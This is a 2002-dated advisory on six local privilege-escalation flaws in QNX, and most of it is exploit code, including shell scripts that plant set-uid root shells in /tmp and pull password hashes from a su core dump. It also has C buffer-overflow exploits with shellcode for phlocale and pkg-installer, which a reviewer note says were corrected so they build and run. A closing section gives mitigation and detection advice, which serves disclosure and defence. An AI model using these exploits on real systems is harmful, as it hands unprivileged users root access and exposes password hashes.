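# QNX Multiple Security Vulnerabilities (ptrace, SIGSEGV, phgrafx, phlocale)

*Advisory date: 5/6/2002. Proof-of-concept code credited to www.badc0ded.com in the original exploit headers.*

## Summary

QNX is a complete operating system aimed at the embedded computing market. Multiple security vulnerabilities have been found in the product; every one of them allows a **local**, unprivileged user to gain elevated (root) privileges. None of them is remotely exploitable on its own, but any of them turns an ordinary user account into a full compromise of the host.

> Reviewer note: the listings below are the proofs of concept as published in 2002, reformatted and with their scripting/portability errors corrected so that they read and build correctly (each fix is called out in a comment). They target one specific QNX 6 build: the `break *main+44` offset in Issue #1 and the hard-coded `system()` and return addresses in Issues #5 and #6 are build-specific and will have to be re-derived for any other target. Run them only on systems you are authorised to test.

## Issue #1 — unrestricted process attachment (ptrace)

QNX allows a local user to attach a debugger to **any** process, including set-uid binaries running with an effective uid other than the user's own. A conventional Unix kernel refuses attachment to a process whose credentials differ from the tracer's and to any process that has changed its effective uid as a result of the set-uid bit. Without that check a local attacker can take control of a system-sensitive process and make it execute whatever he likes.

Demonstration. A trivial set-uid-root program that prints its effective uid:

```c
/* tmp.c: print the effective uid so it is visible whether set-uid took effect. */
#include <stdio.h>
#include <unistd.h>

int main(void)
{
    printf("euid=%i\n", (int)geteuid());
    return 0;
}
```

```
$ ls -l tmp
-rwsr-xr-x  1 root  100  4021 May 20 13:31 tmp
$ ./tmp
euid=0
```

So far everything is normal. Now the same binary is run under a debugger by the unprivileged user:

```
$ gdb tmp
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "--host=x86-pc-nto-qnx --target=ntox86"...
(no debugging symbols found)...
(gdb) r
Starting program: /tmp/tmp
(gdb) c
Continuing.
euid=0
Program exited normally.
(gdb)
```

Not the result you would expect: the debuggee keeps euid 0 while it is fully under the control of an unprivileged gdb, which can stop it anywhere and call arbitrary functions inside it.

Exploit:

```sh
#!/bin/sh
# Issue #1 PoC: run /bin/su under gdb, stop it shortly after main(), call
# setuid(0) inside it, and let it continue into a script of our choosing.
# http://www.badc0ded.com
#
# Fixes against the published version: the second 'echo' used '>' and so
# overwrote the shebang line it had just written to /tmp/runme; the gdb
# command file was written to /tmp/badc0ded but read from the current
# directory ("gdb /bin/su < badc0ded").
# The "break *main+44" offset is specific to the tested /bin/su build.

echo "#!/bin/sh"            >  /tmp/runme
echo "cp /bin/sh /tmp/sh"   >> /tmp/runme
echo "chmod 4755 /tmp/sh"   >> /tmp/runme
chmod 755 /tmp/runme

echo "r root -c /tmp/runme" >  /tmp/badc0ded
echo "break *main+44"       >> /tmp/badc0ded
echo "c"                    >> /tmp/badc0ded
echo "call setuid(0)"       >> /tmp/badc0ded
echo "c"                    >> /tmp/badc0ded

gdb /bin/su < /tmp/badc0ded > /dev/null
echo "www.badc0ded.com"
sleep 1
# clean up every artefact, including the set-uid copy of /bin/sh
rm /tmp/runme /tmp/badc0ded /tmp/sh
```

## Issue #2 — /bin/su accepts SIGSEGV and dumps a world-readable core

An unprivileged user can send SIGSEGV to a running `/bin/su` (the process was started by that user, so the signal is delivered even though su is running with euid 0). su does not block or handle the signal and dumps core to `/var/dumps/su.core`, and the core file is world-readable. Because su has already read the password database at that point, the core contains the password hashes.

Exploit:

```sh
#!/bin/sh
# Issue #2 PoC: make /bin/su dump core and harvest password hashes from it.
# If everything works you should get a "copy" of /etc/shadow in /tmp/mypasswd.
# www.badc0ded.com   <= we are in the .dot core, really :)
#
# The published version found su with `ps -A | grep su | awk {'print $1'}`,
# which also matches every other process whose name contains "su" and would
# signal all of them. The shell already knows the PID of the job it just
# backgrounded ($!), so use that. If the core turns out not to contain the
# hashes, su had presumably not yet read the password file when the signal
# arrived; a short delay before the kill may be needed.

su > /dev/null &
kill -SEGV $!
strings /var/dumps/su.core | grep ":0:0" > /tmp/mypasswd
```

## Issue #3 — phgrafx runs crttrap via system() without dropping its euid

`phgrafx` is set-uid root and executes `crttrap` through `system()` without first dropping its effective uid, and without an absolute path. `system()` hands the command line to `/bin/sh`, which resolves the bare name `crttrap` through the caller's `$PATH` — an environment variable the attacker controls. Putting a directory he owns at the front of `$PATH` therefore gets an arbitrary script run as root.

Exploit:

```sh
#!/bin/sh
# Issue #3 PoC: plant a fake 'crttrap' ahead of the real one in $PATH and let
# the set-uid phgrafx run it through system().
#
# In phgrafx: click Advanced, Done, Apply, Accept and Done.
# Afterwards a set-uid root shell should be waiting in /tmp/badc0ded.
# www.badc0ded.com
#
# The published wrapper forwarded only "$1".."$9" (one escaped echo per
# line); "$@" forwards every argument, quoted, so the real crttrap still
# gets exactly what phgrafx passed.

cat > /tmp/crttrap <<'EOF'
#!/bin/sh
cp /bin/sh /tmp/badc0ded
chmod 4777 /tmp/badc0ded
# pass through to the real binary so phgrafx keeps working normally
/usr/bin/crttrap "$@"
EOF
chmod 755 /tmp/crttrap
export PATH="/tmp:$PATH"
/usr/photon/bin/phgrafx
```

## Issue #4 — phgrafx-startup

This vulnerability is the same flaw as Issue #3 in a second binary: `phgrafx-startup` also invokes `crttrap` through `system()` by its bare name while still privileged. Only the dialog sequence that triggers the call differs.

Exploit:

```sh
#!/bin/sh
# Issue #4 PoC: identical to Issue #3, triggered through phgrafx-startup.
#
# In phgrafx-startup: click Test, Restore, Continue.
# Afterwards a set-uid root shell should be waiting in /tmp/badc0ded.
# www.badc0ded.com

cat > /tmp/crttrap <<'EOF'
#!/bin/sh
cp /bin/sh /tmp/badc0ded
chmod 4777 /tmp/badc0ded
# pass through to the real binary so phgrafx-startup keeps working normally
/usr/bin/crttrap "$@"
EOF
chmod 755 /tmp/crttrap
export PATH="/tmp:$PATH"
/usr/photon/bin/phgrafx-startup
```

## Issue #5 — phlocale buffer overflow via $ABLANG

`phlocale` copies the `ABLANG` environment variable into a fixed-size stack buffer without a bounds check. An over-long value overwrites the saved return address; since the binary runs with euid 0, the attacker gets a root shell.

Exploit:

```c
/* QNX phlocale $ABLANG exploit, gives you a cute euid=0 shell.
 * If it doesn't work for you, then you most likely need to change
 * the address to system() and/or the ret.
 *
 * www.badc0ded.com
 *
 * Reviewer fixes: headers and int main(void) added; the published code
 * called setenv() with two arguments (the third, 'overwrite', is required)
 * and terminated execlp() with a plain 0 instead of (char *)NULL. The
 * shellcode and both addresses are untouched.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* 23 bytes, no NUL inside. jmp/call/pop fetches a pointer to the trailing
 * "sh", the mov NUL-terminates it, it is pushed as the argument and
 * system() is called through %ebx. */
static const char shellcode[] =
    "\xeb\x0e\x31\xc0\x5b"
    "\x88\x43\x2\x53\xbb"
    "\x80\x95\x04\x08"          /* system() address -- target specific */
    "\xff\xd3\xe8\xed\xff"
    "\xff\xff\x73\x68";

/* Value written over the saved return address -- target specific. */
static const char ret_addr[] = "\x78\x7b\x04\x08";

int main(void)
{
    char payload[1000];

    /* NOP sled, then shellcode and return address at offset 971:
     * 971 + 23 + 4 + terminating NUL = 999 bytes, fits the buffer. */
    memset(payload, 0x90, sizeof(payload));
    sprintf(payload + 971, "%s%s", shellcode, ret_addr);

    if (setenv("ABLANG", payload, 1) != 0) {
        perror("setenv");
        return 1;
    }
    execlp("/usr/photon/bin/phlocale", "phlocale", (char *)NULL);
    perror("execlp");           /* only reached when the exec fails */
    return 1;
}
```

## Issue #6 — pkg-installer buffer overflow via the -u argument

`pkg-installer` copies the value of its `-u` command-line option into a fixed-size stack buffer without a bounds check, so an over-long argument overwrites the return address. It is locally exploitable for root in the same way as Issue #5.

Exploit:

```c
/* Quick and dirty QNX pkg-installer root exploit.
 * The shellcode sucks, it is longer than it has to be and you need the
 * address to system() for it to work. Yes I know I'm lazy....
 *
 * http://www.badc0ded.com
 *
 * Usage: exploit [offset]
 *   offset (decimal) is subtracted from the default return address
 *   0x804786d so the stack location can be searched for.
 *
 * Reviewer fixes: headers and main prototype added. The published code
 * pointed a char * at an int and handed it to "%s", so sprintf copied the
 * four address bytes and then kept reading past 'ret' until it found a zero
 * somewhere on the stack (undefined behaviour, and extra bytes in the
 * payload). The address now goes through a NUL-terminated 4-byte buffer.
 * atoi() is replaced by a checked strtol(), the address is held in an
 * unsigned so the wrap-around on subtraction and the "%x" format are
 * defined, and execlp() gets a (char *)NULL terminator.
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Same jmp/call/pop system("sh") stub as the phlocale exploit, with the
 * system() address of this binary -- target specific. */
static const char shellcode[] =
    "\xeb\x0e\x31\xc0\x5b"
    "\x88\x43\x2\x53\xbb"
    "\xe4\xb4\x04\x08"          /* system() address -- target specific */
    "\xff\xd3\xe8\xed\xff"
    "\xff\xff\x73\x68";

int main(int argc, char **argv)
{
    unsigned int ret = 0x804786d;   /* default return address -- target specific */
    char ret_bytes[5];              /* 4 address bytes (host order) + NUL for "%s" */
    char payload[2000];

    if (argc >= 2) {
        char *end;
        errno = 0;
        long off = strtol(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || errno == ERANGE) {
            fprintf(stderr, "usage: %s [offset]\n", argv[0]);
            return 1;
        }
        ret -= (unsigned int)off;   /* negative offsets move the address up */
    }
    printf("using ret %x\n", ret);

    memcpy(ret_bytes, &ret, 4);     /* i386 target: 4-byte little-endian address */
    ret_bytes[4] = '\0';
    if (memchr(ret_bytes, 0, 4) != NULL) {
        /* "%s" would stop at the zero and truncate the address */
        fprintf(stderr, "chosen ret contains a NUL byte, pick another offset\n");
        return 1;
    }

    /* NOP sled of 1254 bytes, then shellcode + address; 1254 + 23 + 4 + NUL
     * ends at byte 1282, well inside the 2000-byte buffer. */
    memset(payload, 0x90, 1254);
    sprintf(payload + 1254, "%s%s", shellcode, ret_bytes);

    execlp("/usr/photon/bin/pkg-installer", "pkg-installer", "-u", payload,
           (char *)NULL);
    perror("execlp");               /* only reached when the exec fails */
    return 1;
}
```

## Mitigation and what to check

- **Issue #1:** the kernel-side fix is to refuse debugger attachment to any process whose real/effective/saved uids differ from the tracer's, and to any process that gained privileges through a set-uid bit. There is no user-level workaround visible here; this needs a vendor fix.
- **Issue #2:** set-uid programs should not dump core at all, and whatever is dumped must not be world-readable (`/var/dumps/su.core` was). Check the permissions of `/var/dumps` and of existing core files; a core of a privileged program in that directory is also a useful incident indicator.
- **Issues #3 and #4:** a privileged program must never call `system()` with a bare command name and an inherited environment. Use an absolute path and a sanitised `PATH`/`IFS`, or better drop privileges first and spawn the helper with `exec*`/`posix_spawn` and an explicit argv. Until patched, treat a session with `/tmp` at the front of `$PATH` that launches Photon tools as suspicious.
- **Issues #5 and #6:** classic unbounded copies of an environment variable and of a command-line option into stack buffers; the code needs length checks before the copy. As an interim measure, remove the set-uid bit from `phlocale` and `pkg-installer` if it is present on your install (it must be for the PoCs to yield euid 0), accepting that the tools then only work for root.
- **Across all issues:** a set-uid copy of `/bin/sh` under `/tmp` (`/tmp/sh`, `/tmp/badc0ded`) is the artefact every PoC leaves behind; a periodic scan for set-uid files in world-writable directories will catch it.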